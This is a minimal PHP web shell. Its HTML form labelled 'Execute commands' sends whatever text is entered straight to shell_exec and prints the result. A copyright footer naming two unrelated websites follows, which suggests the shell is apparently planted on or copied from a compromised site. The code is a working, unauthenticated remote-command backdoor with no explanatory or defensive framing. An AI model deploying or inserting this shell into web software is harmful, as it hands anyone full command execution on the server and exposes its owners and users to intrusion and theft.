<center> <h1>Execute commands</h1> <form method="POST" action=""> <input type="text" name="cmd" placeholder="Execute Commands"> <input type="submit" value=">>"> </form> <?php $cmd = $_POST['cmd']; $exec = shell_exec("$cmd"); echo "<textarea rows='15' cols='85'>$exec</textarea>"; ?>
Copyright © 2019 whyseal.com relojescopiar.com All rights reserved.